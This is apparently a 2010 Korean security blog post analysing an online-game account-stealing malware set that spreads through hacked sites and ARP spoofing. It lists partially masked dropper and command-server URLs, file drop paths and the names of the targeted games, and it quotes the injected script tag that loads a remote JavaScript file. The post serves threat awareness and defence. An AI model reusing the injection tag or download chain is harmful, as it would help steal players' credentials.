반응형
(사진 출처 : http://blog.naver.com/sheistong/140110741858)
2010-09-03일 처음으로 ARP Spoofing 관련 내용을 접하였고, 주말을 통해 전파속도가 급속히 늘어났다.
현재까지 발견 된 스크립트는 다음과 같다.
- 9월 3일 변조 된 국내외 홈페이지에서 발견 된 스크립트 형태
http://www.xzjiay***.com/ad/yahoo.js
http://www.xzjiay***.com/ad/ad.htm
http://www.xzjiay***.com/ad/news.html
http://www.xzjiay***.com/ad/count1.html
http://www.dadi***.com/images/s.exe
- 9월 6일 변형 된 스크립트 형태
http://www.fal***.com/js/yahoo.js
http://www.fal***.com/js/ad.htm
http://www.fal***.com/js/news.html
http://www.fal***.com/js/count.html
http://www.exi***.com/images/s.exe
현재 9월 6일에 발견 된 URL은 아직도 접속 및 다운로드가 가능하다.
키사에서는 모하는건지 ㅡ.ㅡ;; 후딱 좀 블럭처리좀 해주시지!!
어디서 자꾸 변종파일들이 들어온다 ㅡ.ㅡ;;
이번에 문제가 되는 악성코드 세트이다. 나열된 순서가 악성코드가 시작되는 순서이다.
- 파일분석(s.exe, V.DWN.Onlinegame.PA.Gen)
s.exe 파일은 다음 파일을 생성시킨다.
C:\Documents and Settings\<UserName>\Microsoft\smx4pnp.dll
- 파일분석(smx4pnp.dll, V.DWN.Onlinegame.PA.Gen)
특정서버에 접속하여 파일을 다운로드 한다.
http://202.109.***.**:81/s.txt
http://202.109.***.**:81/ma.exe
http://202.109.***.**:81/tt.exe
http://98.126.**.***:81/s.txt
http://98.126.**.***:81/ma.exe
http://98.126.**.***:81/tt.exe
- 파일분석(ma.exe, V.DRP.OnlineGames.kv)
ma.exe 파일은 다음 파일을 생성시킨다.
C:\WINDOWS\system32\xcvaver0.dll
- 파일분석(xcvaver0.dll, S.SPY.OnlineGames.kv)
국내 온라인 게임의 아이디 및 패스워드를 가로채며, 특정 보안제품의 동작을 방해한다.
대상은 메이폴스토리, 던전앤파이터,플레이엔씨 등이 있다.
- 파일분석(tt.exe, V.TRJ.ARPSpoofing.faloge)
tt.exe 파일은 다음 파일을 생성시킨다.
C:\WINDOWS\system32\nvsvc.exe
- 파일분석(nvsvc.exe, V.TRJ.ARPSpoofing.faloge)
자신이 동작 된 PC의 IP를 확인하여 C클래스 xx.xx.xx.1 ~ 255 까지 순차적으로 ARP Spoofing 공격을 실행하여 같은 네트워크단에 있는 PC가 인터넷 사용시 다음 스크립트를 삽입시킨다.
<script src=http://www.fal***.com/js/yahoo.js></script>
'IT 보안소식' 카테고리의 다른 글
| 카스퍼스키(Kaspersky), 안드로이드OS SMS 트로이목마 발견(Trojan-SMS.AndroidOS.FakePlayer.b) (0) | 2010.09.09 |
|---|---|
| 애플(Apple), iPhone iOS 4.1 업데이트 발표 (2) | 2010.09.09 |
| 알약(ALYac), ARP Spoofing 공격을 실행하는 온라인 게임 계정 탈취 악성코드 주의 (0) | 2010.09.07 |
| 폰스토어(PhoneStore), "아이폰4" 개통 일정 드디어 발표했다. (0) | 2010.09.04 |
| 구글 크롬(Google Chrome), 속도의 끝을 보여준다 구글 크롬 6.0 업데이트 (8) | 2010.09.04 |
댓글